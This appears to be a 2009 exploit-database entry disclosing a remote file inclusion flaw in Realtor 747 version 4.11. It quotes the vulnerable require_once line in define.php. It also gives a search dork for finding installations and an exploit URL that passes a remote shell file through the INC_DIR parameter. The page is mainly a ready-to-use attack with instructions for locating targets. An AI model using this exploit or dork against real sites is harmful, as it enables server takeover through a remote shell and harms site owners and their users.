[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Realtor 747 (define.php INC_DIR) Remote File Inclusion Vulnerability
# Published : 2009-01-12
# Author : ahmadbady
# Previous Title : dMx READY ( 25 Products ) Remote Database Disclosure Vulnerability
# Next Title : Joomla com_xevidmegahd (catid) Remote SQL Injection Exploit


-----------------:Remote File Include:-----------------
              -------------------------------------------------------


script:realtor747 Version 4.11
   
------------------------------------------------------------------
download from:http://www.it747.com/realtor747/intro/trial/realtor747-v4-11-trial.zip
   
------------------------------------------------------------------

.......................................................
vul:/include/define.php line 51:

require_once( "$INC_DIR/define_area.php" );

------------------------------------------------------

dork:"REALTOR 747 - Version 4.11"
-----------------------------------------------------

xpl:

http://127.0.0.1/path/include/define.php?INC_DIR=[shell.txt?]


***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady   [kivi_hacker666@yahoo.com]
---------------------------------------------------

# www.Syue.com [2009-01-12]